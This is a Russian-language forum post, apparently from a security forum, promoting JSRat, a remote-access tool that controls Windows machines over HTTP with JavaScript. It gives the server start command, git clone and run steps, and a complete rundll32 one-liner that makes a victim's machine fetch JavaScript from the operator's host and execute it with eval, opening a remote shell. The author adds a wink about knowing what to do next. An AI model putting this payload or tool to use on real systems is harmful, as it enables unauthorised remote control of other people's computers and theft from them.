Soft JSRAT - HTTP-оболочка с использованием JavaScript

Всем привет.
Страница разработчика -== aspiggy/JSRAT
Разработчик -== aspiggy

Внимание! Автор не несет никакой ответственности за плохое использование этого инструмента!
Введение.
ratbinary.png



JSRat - это инструмент управления и контроля, в котором используются служебные данные JavaScript и протокол HTTP для связи между сервером и целевыми узлами. Есть два варианта реализации в Python и один в PowerShell.

JSRat запустит веб-сервер и будет ждать выполнения команды клиента:
Код:
# python JSRat.py -i 192.168.42.101 -p 8080

После того, как пользователь посетит URL-адрес команды клиента, соединение будет установлено с хостом. JSRat может использоваться для выполнения команд, запускать исполняемые файлы/скрипты.

Screenshot from 2018-08-26 20-22-08.png

Чтобы установить правильную оболочку, необходимо выполнить загрузку JavaScript. Эта полезная нагрузка хранится по URL-адресу:

Screenshot from 2018-08-26 20-25-36.png

Команда, которая была сгенерирована, должна быть выполнена из командной строки:
Код:
Cmd Windows:
# rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.42.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

После выполнения команды будет получена оболочка.

Дальше вы знаете что делать. :devilish:;)

Код:
Пример:
# run
codeby.net.exe

Код:
Установка и запуск:
# git clone https://github.com/aspiggy/JSRAT.git
# cd JSRAT
# Пример запуска: python JSRat.py -i 192.168.42.101 -p 8080


Спасибо за внимание.
 
Последнее редактирование модератором:
G

ghost8

какой дурак только будет вводить это в cmd)))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!